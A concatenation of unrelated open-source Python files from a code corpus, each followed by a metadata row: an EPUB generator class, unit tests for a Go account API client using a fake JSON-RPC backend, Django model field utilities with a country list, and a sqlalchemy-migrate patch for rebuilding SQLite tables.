unittest.main()
| apache-2.0 | 4,212,838,040,843,026,400 | 31.532258 | 80 | 0.695092 | false |
leandro86/epubcreator | epubcreator/epubbase/ebook.py | 1 | 14784 | import os
from lxml import etree
from epubcreator.pyepub.pyepubwriter import epub
from epubcreator.epubbase import ebook_metadata, ebook_data, files, images
from epubcreator.misc import utils
from epubcreator.misc.options import Options, Option
class Ebook(Options):
OPTIONS = [Option(name="includeOptionalFiles",
value=True,
description="Indica si los archivos opcionales (dedicatoria.xhtml y autor.xhtml) deben incluirse en el epub "
"incluso si los respectivos campos no fueron ingresados.")]
def __init__(self, ebookData, metadata=None, **options):
super().__init__(**options)
self._ebookData = ebookData or ebook_data.EbookData()
self._metadata = metadata or ebook_metadata.Metadata()
def save(self, file):
"""
        Generate and save the epub.
        @param file: a string with the directory where the epub should be saved (not the file
        name, since that must be generated from the metadata), or a file-like object.
        @return: the path of the generated file, if "file" is a string. If "file" is a
        file-like object, the name of the epub file is returned.
"""
outputEpub = epub.EpubWriter()
self._addEpubBaseFiles(outputEpub)
self._addSectionsAndToc(outputEpub)
self._addImages(outputEpub)
self._addMetadata(outputEpub)
epubName = self._getOutputFileName()
        # Check whether "file" is a string (i.e. a directory) or a file-like object.
if isinstance(file, str):
fileName = os.path.join(file, epubName)
outputEpub.generate(fileName)
return fileName
else:
outputEpub.generate(file)
return epubName
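    # Example usage (sketch; the EbookData and Metadata instances are assumed to be
    # populated elsewhere, and the output directory is hypothetical):
    #   book = Ebook(ebookData, metadata)
    #   path = book.save("/tmp/out")        # directory given: returns the full file path
    #   name = book.save(io.BytesIO())      # file-like given: returns the epub file name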
def _addEpubBaseFiles(self, outputEpub):
synopsis = self._metadata.synopsis or ebook_metadata.Metadata.DEFAULT_SYNOPSIS
title = self._metadata.title or ebook_metadata.Metadata.DEFAULT_TITLE
editor = self._metadata.editor or ebook_metadata.Metadata.DEFAULT_EDITOR
coverModification = self._metadata.coverModification or ebook_metadata.Metadata.DEFAULT_COVER_MODIFICATION
coverImage = self._metadata.coverImage or images.CoverImage(files.EpubBaseFiles.getFile(files.EpubBaseFiles.COVER_IMAGE_FILENAME))
publicationYear = self._metadata.publicationDate.year if self._metadata.publicationDate else ""
authors = self._metadata.authors or [ebook_metadata.Person(ebook_metadata.Metadata.DEFAULT_AUTHOR, ebook_metadata.Metadata.DEFAULT_AUTHOR)]
author = self._getPersonsListAsText(authors)[0]
translator = self._getPersonsListAsText(self._metadata.translators)[0]
ilustrator = self._getPersonsListAsText(self._metadata.ilustrators)[0]
        # Add the required xhtml files, except autor.xhtml, which must go after the sections.
outputEpub.addHtmlData(files.EpubBaseFiles.COVER_FILENAME, files.EpubBaseFiles.getFile(files.EpubBaseFiles.COVER_FILENAME))
outputEpub.addHtmlData(files.EpubBaseFiles.SYNOPSIS_FILENAME, files.EpubBaseFiles.getSynopsis(synopsis))
outputEpub.addHtmlData(files.EpubBaseFiles.TITLE_FILENAME, files.EpubBaseFiles.getTitle(author,
title,
self._metadata.subtitle,
editor,
self._metadata.collectionName,
self._metadata.subCollectionName,
self._metadata.collectionVolume))
outputEpub.addHtmlData(files.EpubBaseFiles.INFO_FILENAME, files.EpubBaseFiles.getInfo(self._metadata.originalTitle,
author,
publicationYear,
translator,
ilustrator,
self._metadata.coverDesigner,
coverModification,
editor))
if self._metadata.dedication or self._options.includeOptionalFiles:
dedication = self._metadata.dedication or ebook_metadata.Metadata.DEFAULT_DEDICATION
outputEpub.addHtmlData(files.EpubBaseFiles.DEDICATION_FILENAME, files.EpubBaseFiles.getDedication(dedication))
outputEpub.addImageData(files.EpubBaseFiles.COVER_IMAGE_FILENAME, coverImage.toBytes())
        # Add the rest of the epubbase files.
outputEpub.addImageData(files.EpubBaseFiles.EPL_LOGO_FILENAME, files.EpubBaseFiles.getFile(files.EpubBaseFiles.EPL_LOGO_FILENAME))
outputEpub.addImageData(files.EpubBaseFiles.EX_LIBRIS_FILENAME, files.EpubBaseFiles.getFile(files.EpubBaseFiles.EX_LIBRIS_FILENAME))
outputEpub.addStyleData(files.EpubBaseFiles.STYLE_FILENAME, files.EpubBaseFiles.getFile(files.EpubBaseFiles.STYLE_FILENAME))
outputEpub.addMetaFile(files.EpubBaseFiles.APPLE_XML, files.EpubBaseFiles.getFile(files.EpubBaseFiles.APPLE_XML))
def _addSectionsAndToc(self, outputEpub):
def processSections(sections):
navPoints = []
previousLevel = "1"
for section in sections:
outputEpub.addHtmlData(section.name, section.toHtml())
hs = section.xpath("//h1 | //h2 | //h3 | //h4 | //h5 | //h6")
for h in hs:
currentLevel = h.tag[-1]
titleText = self._getTitleText(h)
titleId = h.get("id")
titleSrc = "{0}{1}".format(section.name, "#" + titleId if titleId else "")
if currentLevel == "1":
navPoints.append(outputEpub.addNavPoint(titleSrc, titleText))
else:
if currentLevel < previousLevel:
for i in range(int(previousLevel) - int(currentLevel) + 1):
navPoints.pop()
elif currentLevel == previousLevel:
navPoints.pop()
childNavPoint = navPoints[-1].addNavPoint(titleSrc, titleText)
navPoints.append(childNavPoint)
previousLevel = currentLevel
        # The cover must be the first entry in the toc.
outputEpub.addNavPoint(files.EpubBaseFiles.COVER_FILENAME, "Cubierta")
        # The book title must be the second entry in the toc.
outputEpub.addNavPoint(files.EpubBaseFiles.TITLE_FILENAME, self._metadata.title or ebook_metadata.Metadata.DEFAULT_TITLE)
processSections(self._ebookData.iterTextSections())
authors = self._metadata.authors or [ebook_metadata.Person(ebook_metadata.Metadata.DEFAULT_AUTHOR, ebook_metadata.Metadata.DEFAULT_AUTHOR)]
authorsWithBiographyOrImage = [a for a in authors if a.biography or a.image or self._options.includeOptionalFiles]
for i, author in enumerate(authorsWithBiographyOrImage):
biography = author.biography or ebook_metadata.Metadata.DEFAULT_AUTHOR_BIOGRAPHY
image = author.image or images.AuthorImage(files.EpubBaseFiles.getFile(files.EpubBaseFiles.AUTHOR_IMAGE_FILENAME), allowProcessing=False)
title = self._getTocTitleForAuthorFile(authors) if i == 0 else None
imageName = files.EpubBaseFiles.generateAuthorImageFileName(i)
authorContent = files.EpubBaseFiles.getAuthor(biography, title, imageName)
outputEpub.addHtmlData(files.EpubBaseFiles.generateAuthorFileName(i), authorContent)
outputEpub.addImageData(imageName, image.toBytes())
if len(authorsWithBiographyOrImage) > 0:
outputEpub.addNavPoint(files.EpubBaseFiles.AUTHOR_FILENAME, self._getTocTitleForAuthorFile(authors))
processSections(self._ebookData.iterNotesSections())
def _addImages(self, outputEpub):
for image in self._ebookData.iterImages():
outputEpub.addImageData(image.name, image.content)
def _addMetadata(self, outputEpub):
authors = self._metadata.authors or [ebook_metadata.Person(ebook_metadata.Metadata.DEFAULT_AUTHOR, ebook_metadata.Metadata.DEFAULT_AUTHOR)]
author = self._getPersonsListAsText(authors)
        # Add semantics to cubierta.xhtml.
outputEpub.addReference(files.EpubBaseFiles.COVER_FILENAME, "Cover", "cover")
        # Semantics must also be added to cover.jpg, otherwise some ereaders do not recognize it as the cover image.
outputEpub.addCustomMetadata("cover", files.EpubBaseFiles.COVER_IMAGE_FILENAME)
outputEpub.addTitle(self._metadata.title or ebook_metadata.Metadata.DEFAULT_TITLE)
outputEpub.addAuthor(author[0], author[1])
outputEpub.addLanguage(self._metadata.language or ebook_metadata.Metadata.DEFAULT_LANGUAGE)
if self._metadata.synopsis:
            # The synopsis (the description field) in the metadata cannot contain line breaks. They could
            # simply be removed, but then the text of paragraph B would end up stuck to that of paragraph A.
            # That is why line breaks are replaced with a space.
outputEpub.addDescription(utils.removeTags(self._metadata.synopsis.replace("\n", " ")))
else:
outputEpub.addDescription("Sinopsis")
outputEpub.addPublisher("ePubLibre")
        # The genre type does not matter when a default has to be used, since it does not appear in the epub metadata.
genres = self._metadata.genres or [ebook_metadata.Genre("bla", "Género", "Subgéneros")]
        # Sort the genres alphabetically.
genres.sort(key=lambda x: (x.genreType, x.genre, x.subGenre))
genresText = []
previousGenre = ""
for genre in genres:
if genre.genre != previousGenre:
genresText.append(genre.genre)
previousGenre = genre.genre
genresText.append(genre.subGenre)
outputEpub.addSubject(", ".join(genresText))
if self._metadata.translators:
translator = self._getPersonsListAsText(self._metadata.translators)
outputEpub.addTranslator(translator[0], translator[1])
if self._metadata.ilustrators:
ilustrator = self._getPersonsListAsText(self._metadata.ilustrators)
outputEpub.addIlustrator(ilustrator[0], ilustrator[1])
if self._metadata.publicationDate is not None:
outputEpub.addPublicationDate(self._metadata.publicationDate)
if self._metadata.subCollectionName:
calibreSeries = ""
if self._metadata.collectionName:
calibreSeries += "{0}: ".format(self._metadata.collectionName)
calibreSeries += self._metadata.subCollectionName
try:
                # Strip the leading zeros if the volume is a number.
series_index = str(int(self._metadata.collectionVolume))
except ValueError:
series_index = self._metadata.collectionVolume
outputEpub.addCustomMetadata("calibre:series", calibreSeries)
outputEpub.addCustomMetadata("calibre:series_index", series_index)
def _getOutputFileName(self):
authors = self._metadata.authors or [ebook_metadata.Person(ebook_metadata.Metadata.DEFAULT_AUTHOR, ebook_metadata.Metadata.DEFAULT_AUTHOR)]
fileName = []
authorsFileAs = [author.fileAs for author in authors]
if len(authorsFileAs) < 3:
fileName.append(" & ".join(authorsFileAs))
else:
fileName.append("AA. VV.")
fileName.append(" - ")
if self._metadata.subCollectionName:
collection = ""
if self._metadata.collectionName:
collection += "[{0}] ".format(self._metadata.collectionName)
collection += "[{0} {1}] ".format(self._metadata.subCollectionName, self._metadata.collectionVolume)
if self._metadata.collectionName:
fileName.insert(0, collection)
else:
fileName.append(collection)
fileName.append(self._metadata.title or ebook_metadata.Metadata.DEFAULT_TITLE)
bookId = self._metadata.bookId or ebook_metadata.Metadata.DEFAULT_BOOK_ID
editor = self._metadata.editor or ebook_metadata.Metadata.DEFAULT_EDITOR
fileName.append(" [{0}] (r1.0 {1})".format(bookId, editor))
return utils.toFileName("{0}.epub".format("".join(fileName)))
def _getPersonsListAsText(self, persons):
"""
        Convert a list of Person to text. Each Person is concatenated with an & (ampersand).
        @param persons: a list of Person.
        @return: a tuple whose first element is a string with all the names concatenated, and
        whose second element is a string with all the file-as values concatenated.
"""
return " & ".join((p.name for p in persons)), " & ".join((p.fileAs for p in persons))
def _getTocTitleForAuthorFile(self, authors):
if not authors or (len(authors) == 1 and authors[0].gender == ebook_metadata.Person.MALE_GENDER):
return "Autor"
else:
return "Autores" if len(authors) > 1 else "Autora"
def _getTitleText(self, h):
"""
        Return the text of a heading, replacing "br" tags with a space.
"""
if h.xpath("descendant::br"):
            # The "h" element cannot be modified directly; we need to work on a copy.
            # A deep copy is another option, but it would probably end up copying
            # the whole tree...
h = etree.fromstring(etree.tostring(h))
for br in h.xpath("descendant::br"):
br.text = " "
etree.strip_tags(h, "br")
return "".join(h.xpath("descendant::text()")) | unlicense | 1,965,789,741,287,960,000 | 50.632867 | 149 | 0.609237 | false |
praekelt/go-http-api | go_http/tests/test_account.py | 1 | 8152 | """
Tests for go_http.account
"""
import collections
import copy
import json
from unittest import TestCase
from requests import HTTPError, Session
from requests.adapters import HTTPAdapter
from requests_testadapter import TestSession, Resp, TestAdapter
from go_http.account import AccountApiClient
from go_http.exceptions import JsonRpcException
from go_http.tests.fixtures import account as fixtures
class FakeAccountApiAdapter(HTTPAdapter):
"""
Adapter providing a fake account API.
This inherits directly from HTTPAdapter instead of using TestAdapter
    because it overrides everything TestAdapter does.
"""
def __init__(self, account_api):
self.account_api = account_api
super(FakeAccountApiAdapter, self).__init__()
def send(self, request, stream=False, timeout=None,
verify=True, cert=None, proxies=None):
response = self.account_api.handle_request(request)
r = self.build_response(request, response)
if not stream:
# force prefetching content unless streaming in use
r.content
return r
class FakeAccountApi(object):
def __init__(self, api_path, auth_token):
self.api_path = api_path
self.auth_token = auth_token
self.responses = collections.defaultdict(list)
def http_error_response(self, http_code, error):
return Resp("403 Forbidden", 403, headers={})
def jsonrpc_error_response(self, fault, fault_code, fault_string):
return Resp(json.dumps({
"error": {
"fault": fault, "faultCode": fault_code,
"faultString": fault_string,
},
}), 200, headers={})
def jsonrpc_success_response(self, result):
return Resp(json.dumps({
"error": None,
"result": result,
}), 200, headers={})
def add_success_response(self, method, params, result):
self.responses[method].append((params, copy.deepcopy(result), None))
def add_error_response(self, method, params, **error):
self.responses[method].append((params, None, error))
def handle_request(self, request):
if request.headers['Authorization'] != 'Bearer %s' % (
self.auth_token):
return self.http_error_response(403, "403 Forbidden")
if request.headers['Content-Type'] != (
'application/json; charset=utf-8'):
return self.http_error_response(400, "Invalid Content-Type.")
if request.method != "POST":
return self.jsonrpc_error_response(
"Fault", 8000, "Only POST method supported")
data = json.loads(request.body)
params, result, error = self.responses[data['method']].pop()
assert params == data['params']
if error is not None:
return self.jsonrpc_error_response(**error)
return self.jsonrpc_success_response(result)
class TestAccountApiClient(TestCase):
API_URL = "http://example.com/go"
AUTH_TOKEN = "auth_token"
def setUp(self):
self.account_backend = FakeAccountApi("go/", self.AUTH_TOKEN)
self.session = TestSession()
self.adapter = FakeAccountApiAdapter(self.account_backend)
self.simulate_api_up()
def simulate_api_down(self):
self.session.mount(self.API_URL, TestAdapter("API is down", 500))
def simulate_api_up(self):
self.session.mount(self.API_URL, self.adapter)
def make_client(self, auth_token=AUTH_TOKEN):
return AccountApiClient(
auth_token, api_url=self.API_URL, session=self.session)
def assert_http_error(self, expected_status, func, *args, **kw):
try:
func(*args, **kw)
except HTTPError as err:
self.assertEqual(err.response.status_code, expected_status)
else:
self.fail(
"Expected HTTPError with status %s." % (expected_status,))
def assert_jsonrpc_exception(self, f, *args, **kw):
try:
f(*args, **kw)
except Exception as err:
self.assertTrue(isinstance(err, JsonRpcException))
self.assertTrue(isinstance(err.fault, unicode))
self.assertTrue(isinstance(err.fault_code, int))
self.assertTrue(isinstance(err.fault_string, unicode))
return err
def test_assert_http_error(self):
self.session.mount("http://bad.example.com/", TestAdapter("", 500))
def bad_req():
r = self.session.get("http://bad.example.com/")
r.raise_for_status()
# Fails when no exception is raised.
self.assertRaises(
self.failureException, self.assert_http_error, 404, lambda: None)
# Fails when an HTTPError with the wrong status code is raised.
self.assertRaises(
self.failureException, self.assert_http_error, 404, bad_req)
# Passes when an HTTPError with the expected status code is raised.
self.assert_http_error(500, bad_req)
# Non-HTTPError exceptions aren't caught.
def raise_error():
raise ValueError()
self.assertRaises(ValueError, self.assert_http_error, 404, raise_error)
def test_default_session(self):
client = AccountApiClient(self.AUTH_TOKEN)
self.assertTrue(isinstance(client.session, Session))
def test_default_api_url(self):
client = AccountApiClient(self.AUTH_TOKEN)
self.assertEqual(
client.api_url, "https://go.vumi.org/api/v1/go")
def test_auth_failure(self):
client = self.make_client(auth_token="bogus_token")
self.assert_http_error(403, client.campaigns)
def test_jsonrpc_error_handling(self):
client = self.make_client()
self.account_backend.add_error_response(
"campaigns", [],
fault="Fault", fault_code=8002, fault_string="Meep")
err = self.assert_jsonrpc_exception(client.campaigns)
self.assertEqual(err.fault, "Fault")
self.assertEqual(err.fault_code, 8002)
self.assertEqual(err.fault_string, "Meep")
def test_campaigns(self):
client = self.make_client()
self.account_backend.add_success_response(
"campaigns", [], fixtures.campaigns)
self.assertEqual(client.campaigns(), fixtures.campaigns)
def test_conversations(self):
client = self.make_client()
self.account_backend.add_success_response(
"conversations", ["campaign-1"], fixtures.conversations)
self.assertEqual(
client.conversations("campaign-1"),
fixtures.conversations)
def test_channels(self):
client = self.make_client()
self.account_backend.add_success_response(
"channels", ["campaign-1"], fixtures.channels)
self.assertEqual(
client.channels("campaign-1"),
fixtures.channels)
def test_routers(self):
client = self.make_client()
self.account_backend.add_success_response(
"routers", ["campaign-1"], fixtures.routers)
self.assertEqual(
client.routers("campaign-1"),
fixtures.routers)
def test_routing_entries(self):
client = self.make_client()
self.account_backend.add_success_response(
"routing_entries", ["campaign-1"], fixtures.routing_entries)
self.assertEqual(
client.routing_entries("campaign-1"),
fixtures.routing_entries)
def test_routing_table(self):
client = self.make_client()
self.account_backend.add_success_response(
"routing_table", ["campaign-1"], fixtures.routing_table)
self.assertEqual(
client.routing_table("campaign-1"),
fixtures.routing_table)
    def test_update_routing_table(self):
client = self.make_client()
self.account_backend.add_success_response(
"update_routing_table", ["campaign-1", fixtures.routing_table],
None)
self.assertEqual(
client.update_routing_table("campaign-1", fixtures.routing_table),
None)
| bsd-3-clause | 8,543,179,118,958,206,000 | 34.911894 | 79 | 0.625859 | false |
artminster/artminster | core/utils/fields.py | 1 | 10035 | from django.utils.translation import ugettext as _
from django.db import models, connection
from django.utils.text import capfirst
from itertools import chain
from django.utils.html import conditional_escape
from django.utils.safestring import mark_safe
from django.utils.encoding import force_unicode, smart_unicode
from django import forms
from itertools import chain
from django.conf import settings
from django.contrib.admin import widgets
from django.utils.html import escape
from django.forms.fields import EMPTY_VALUES, Field
from django.forms import ValidationError
from django.db.models.signals import post_delete, post_save
from south.modelsinspector import add_introspection_rules
from django.db.models import OneToOneField
from django.db.models.fields.related import SingleRelatedObjectDescriptor
qn = connection.ops.quote_name
import re
uk_landline_re = re.compile(r'^[0]{1}[1-9]{1}[0-9]{9}$')
uk_landline_no08or09_re = re.compile(r'^[0]{1}[1-7]{1}[0-9]{9}$')
uk_mobile_re = re.compile(r'^(07)[0-9]{9}')
international_number_re = re.compile(r'^[+]?([0-9]*[\.\s\-\(\)]|[0-9]+){3,24}$')
class AutoSingleRelatedObjectDescriptor(SingleRelatedObjectDescriptor):
def __get__(self, instance, instance_type=None):
try:
return super(AutoSingleRelatedObjectDescriptor, self).__get__(instance, instance_type)
except self.related.model.DoesNotExist:
obj = self.related.model(**{self.related.field.name: instance})
obj.save()
return obj
class AutoOneToOneField(OneToOneField):
'''
    A OneToOneField that creates the related object on first access if it doesn't exist yet.
    Use it instead of the original OneToOneField.
example:
class MyProfile(models.Model):
user = AutoOneToOneField(User, primary_key=True)
home_page = models.URLField(max_length=255, blank=True)
icq = models.IntegerField(max_length=255, null=True)
'''
def contribute_to_related_class(self, cls, related):
setattr(cls, related.get_accessor_name(), AutoSingleRelatedObjectDescriptor(related))
def south_field_triple(self):
"Returns a suitable description of this field for South."
from south.modelsinspector import introspector
field_class = OneToOneField.__module__ + "." + OneToOneField.__name__
args, kwargs = introspector(self)
return (field_class, args, kwargs)
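# Example (sketch, assuming the MyProfile model from the docstring above):
#   user = User.objects.get(username='bob')
#   user.myprofile            # the related MyProfile row is created on first access
#   user.myprofile.icq = 12345
#   user.myprofile.save()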
# ISO 3166-1 country names and codes adapted from http://opencountrycodes.appspot.com/python/
COUNTRIES = [
('GB', _('United Kingdom')),
('US', _('United States')),
('AF', _('Afghanistan')),
('AX', _('Aland Islands')),
('AL', _('Albania')),
('DZ', _('Algeria')),
('AS', _('American Samoa')),
('AD', _('Andorra')),
('AO', _('Angola')),
('AI', _('Anguilla')),
('AQ', _('Antarctica')),
('AG', _('Antigua and Barbuda')),
('AR', _('Argentina')),
('AM', _('Armenia')),
('AW', _('Aruba')),
('AU', _('Australia')),
('AT', _('Austria')),
('AZ', _('Azerbaijan')),
('BS', _('Bahamas')),
('BH', _('Bahrain')),
('BD', _('Bangladesh')),
('BB', _('Barbados')),
('BY', _('Belarus')),
('BE', _('Belgium')),
('BZ', _('Belize')),
('BJ', _('Benin')),
('BM', _('Bermuda')),
('BT', _('Bhutan')),
('BO', _('Bolivia')),
('BA', _('Bosnia and Herzegovina')),
('BW', _('Botswana')),
('BV', _('Bouvet Island')),
('BR', _('Brazil')),
('BN', _('Brunei Darussalam')),
('BG', _('Bulgaria')),
('BF', _('Burkina Faso')),
('BI', _('Burundi')),
('KH', _('Cambodia')),
('CM', _('Cameroon')),
('CA', _('Canada')),
('CV', _('Cape Verde')),
('KY', _('Cayman Islands')),
('CF', _('Central African Republic')),
('TD', _('Chad')),
('CL', _('Chile')),
('CN', _('China')),
('CX', _('Christmas Island')),
('CC', _('Cocos Islands')),
('CO', _('Colombia')),
('KM', _('Comoros')),
('CG', _('Congo')),
('CD', _('Congo')),
('CK', _('Cook Islands')),
('CR', _('Costa Rica')),
('CI', _("Cote d'Ivoire")),
('HR', _('Croatia')),
('CU', _('Cuba')),
('CY', _('Cyprus')),
('CZ', _('Czech Republic')),
('DK', _('Denmark')),
('DJ', _('Djibouti')),
('DM', _('Dominica')),
('DO', _('Dominican Republic')),
('EC', _('Ecuador')),
('EG', _('Egypt')),
('SV', _('El Salvador')),
('GQ', _('Equatorial Guinea')),
('ER', _('Eritrea')),
('EE', _('Estonia')),
('ET', _('Ethiopia')),
('FK', _('Falkland Islands')),
('FO', _('Faroe Islands')),
('FJ', _('Fiji')),
('FI', _('Finland')),
('FR', _('France')),
('GF', _('French Guiana')),
('PF', _('French Polynesia')),
('GA', _('Gabon')),
('GM', _('Gambia')),
('GE', _('Georgia')),
('DE', _('Germany')),
('GH', _('Ghana')),
('GI', _('Gibraltar')),
('GR', _('Greece')),
('GL', _('Greenland')),
('GD', _('Grenada')),
('GP', _('Guadeloupe')),
('GU', _('Guam')),
('GT', _('Guatemala')),
('GG', _('Guernsey')),
('GN', _('Guinea')),
('GW', _('Guinea-Bissau')),
('GY', _('Guyana')),
('HT', _('Haiti')),
('HN', _('Honduras')),
('HK', _('Hong Kong')),
('HU', _('Hungary')),
('IS', _('Iceland')),
('IN', _('India')),
('ID', _('Indonesia')),
('IR', _('Iran')),
('IQ', _('Iraq')),
('IE', _('Ireland')),
('IM', _('Isle of Man')),
('IL', _('Israel')),
('IT', _('Italy')),
('JM', _('Jamaica')),
('JP', _('Japan')),
('JE', _('Jersey')),
('JO', _('Jordan')),
('KZ', _('Kazakhstan')),
('KE', _('Kenya')),
('KI', _('Kiribati')),
('KP', _('Korea')),
('KR', _('Korea, Republic of')),
('KW', _('Kuwait')),
('KG', _('Kyrgyzstan')),
('LA', _('Lao')),
('LV', _('Latvia')),
('LB', _('Lebanon')),
('LS', _('Lesotho')),
('LR', _('Liberia')),
('LY', _('Libyan Arab Jamahiriya')),
('LI', _('Liechtenstein')),
('LT', _('Lithuania')),
('LU', _('Luxembourg')),
('MO', _('Macao')),
('MK', _('Macedonia')),
('MG', _('Madagascar')),
('MW', _('Malawi')),
('MY', _('Malaysia')),
('MV', _('Maldives')),
('ML', _('Mali')),
('MT', _('Malta')),
('MH', _('Marshall Islands')),
('MQ', _('Martinique')),
('MR', _('Mauritania')),
('MU', _('Mauritius')),
('YT', _('Mayotte')),
('MX', _('Mexico')),
('MD', _('Moldova')),
('MC', _('Monaco')),
('MN', _('Mongolia')),
('ME', _('Montenegro')),
('MS', _('Montserrat')),
('MA', _('Morocco')),
('MZ', _('Mozambique')),
('MM', _('Myanmar')),
('NA', _('Namibia')),
('NR', _('Nauru')),
('NP', _('Nepal')),
('NL', _('Netherlands')),
('AN', _('Netherlands Antilles')),
('NC', _('New Caledonia')),
('NZ', _('New Zealand')),
('NI', _('Nicaragua')),
('NE', _('Niger')),
('NG', _('Nigeria')),
('NU', _('Niue')),
('NF', _('Norfolk Island')),
('MP', _('Northern Mariana Islands')),
('NO', _('Norway')),
('OM', _('Oman')),
('PK', _('Pakistan')),
('PW', _('Palau')),
('PA', _('Panama')),
('PG', _('Papua New Guinea')),
('PY', _('Paraguay')),
('PE', _('Peru')),
('PH', _('Philippines')),
('PN', _('Pitcairn')),
('PL', _('Poland')),
('PT', _('Portugal')),
('PR', _('Puerto Rico')),
('QA', _('Qatar')),
('RE', _('Reunion')),
('RO', _('Romania')),
('RU', _('Russian Federation')),
('RW', _('Rwanda')),
('BL', _('Saint Barthelemy')),
('SH', _('Saint Helena')),
('KN', _('Saint Kitts and Nevis')),
('LC', _('Saint Lucia')),
('MF', _('Saint Martin')),
('WS', _('Samoa')),
('SM', _('San Marino')),
('ST', _('Sao Tome and Principe')),
('SA', _('Saudi Arabia')),
('SN', _('Senegal')),
('RS', _('Serbia')),
('SC', _('Seychelles')),
('SL', _('Sierra Leone')),
('SG', _('Singapore')),
('SK', _('Slovakia')),
('SI', _('Slovenia')),
('SB', _('Solomon Islands')),
('SO', _('Somalia')),
('ZA', _('South Africa')),
('ES', _('Spain')),
('LK', _('Sri Lanka')),
('SD', _('Sudan')),
('SR', _('Suriname')),
('SJ', _('Svalbard and Jan Mayen')),
('SZ', _('Swaziland')),
('SE', _('Sweden')),
('CH', _('Switzerland')),
('SY', _('Syrian Arab Republic')),
('TW', _('Taiwan')),
('TJ', _('Tajikistan')),
('TZ', _('Tanzania')),
('TH', _('Thailand')),
('TL', _('Timor-Leste')),
('TG', _('Togo')),
('TK', _('Tokelau')),
('TO', _('Tonga')),
('TT', _('Trinidad and Tobago')),
('TN', _('Tunisia')),
('TR', _('Turkey')),
('TM', _('Turkmenistan')),
('TC', _('Turks and Caicos Islands')),
('TV', _('Tuvalu')),
('UG', _('Uganda')),
('UA', _('Ukraine')),
('AE', _('United Arab Emirates')),
('UY', _('Uruguay')),
('UZ', _('Uzbekistan')),
('VU', _('Vanuatu')),
('VE', _('Venezuela')),
('VN', _('Viet Nam')),
('VG', _('Virgin Islands, British')),
('VI', _('Virgin Islands, U.S.')),
('WF', _('Wallis and Futuna')),
('EH', _('Western Sahara')),
('YE', _('Yemen')),
('ZM', _('Zambia')),
('ZW', _('Zimbabwe')),
]
class CountryField(models.CharField):
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 2)
kwargs.setdefault('choices', COUNTRIES)
super(CountryField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "CharField"
# SOUTH INTROSPECTION RULES
add_introspection_rules([], ["^filebrowser\.fields\.FileBrowseField"])
add_introspection_rules([], ["^artminster\.core\.utils\.fields\.CountryField"]) | mit | 4,693,943,054,560,884,000 | 30.264798 | 98 | 0.47703 | false |
JioCloud/oslo-incubator | openstack/common/db/sqlalchemy/migration.py | 1 | 10048 | # coding: utf-8
#
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Base on code in migrate/changeset/databases/sqlite.py which is under
# the following license:
#
# The MIT License
#
# Copyright (c) 2009 Evan Rosson, Jan Dittberner, Domen Kožar
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
import distutils.version as dist_version
import os
import re
import migrate
from migrate.changeset import ansisql
from migrate.changeset.databases import sqlite
from migrate.versioning import util as migrate_util
import sqlalchemy
from sqlalchemy.schema import UniqueConstraint
from openstack.common.db import exception
from openstack.common.db.sqlalchemy import session as db_session
from openstack.common.gettextutils import _ # noqa
@migrate_util.decorator
def patched_with_engine(f, *a, **kw):
url = a[0]
engine = migrate_util.construct_engine(url, **kw)
try:
kw['engine'] = engine
return f(*a, **kw)
finally:
if isinstance(engine, migrate_util.Engine) and engine is not url:
migrate_util.log.debug('Disposing SQLAlchemy engine %s', engine)
engine.dispose()
# TODO(jkoelker) When migrate 0.7.3 is released and nova depends
# on that version or higher, this can be removed
MIN_PKG_VERSION = dist_version.StrictVersion('0.7.3')
if (not hasattr(migrate, '__version__') or
dist_version.StrictVersion(migrate.__version__) < MIN_PKG_VERSION):
migrate_util.with_engine = patched_with_engine
# NOTE(jkoelker) Delay importing migrate until we are patched
from migrate import exceptions as versioning_exceptions
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
_REPOSITORY = None
get_engine = db_session.get_engine
def _get_unique_constraints(self, table):
"""Retrieve information about existing unique constraints of the table
This feature is needed for _recreate_table() to work properly.
Unfortunately, it's not available in sqlalchemy 0.7.x/0.8.x.
"""
data = table.metadata.bind.execute(
"""SELECT sql
FROM sqlite_master
WHERE
type='table' AND
name=:table_name""",
table_name=table.name
).fetchone()[0]
UNIQUE_PATTERN = "CONSTRAINT (\w+) UNIQUE \(([^\)]+)\)"
return [
UniqueConstraint(
*[getattr(table.columns, c.strip(' "')) for c in cols.split(",")],
name=name
)
for name, cols in re.findall(UNIQUE_PATTERN, data)
]
def _recreate_table(self, table, column=None, delta=None, omit_uniques=None):
"""Recreate the table properly
Unlike the corresponding original method of sqlalchemy-migrate this one
doesn't drop existing unique constraints when creating a new one.
"""
table_name = self.preparer.format_table(table)
# we remove all indexes so as not to have
# problems during copy and re-create
for index in table.indexes:
index.drop()
# reflect existing unique constraints
for uc in self._get_unique_constraints(table):
table.append_constraint(uc)
# omit given unique constraints when creating a new table if required
table.constraints = set([
cons for cons in table.constraints
if omit_uniques is None or cons.name not in omit_uniques
])
self.append('ALTER TABLE %s RENAME TO migration_tmp' % table_name)
self.execute()
insertion_string = self._modify_table(table, column, delta)
table.create(bind=self.connection)
self.append(insertion_string % {'table_name': table_name})
self.execute()
self.append('DROP TABLE migration_tmp')
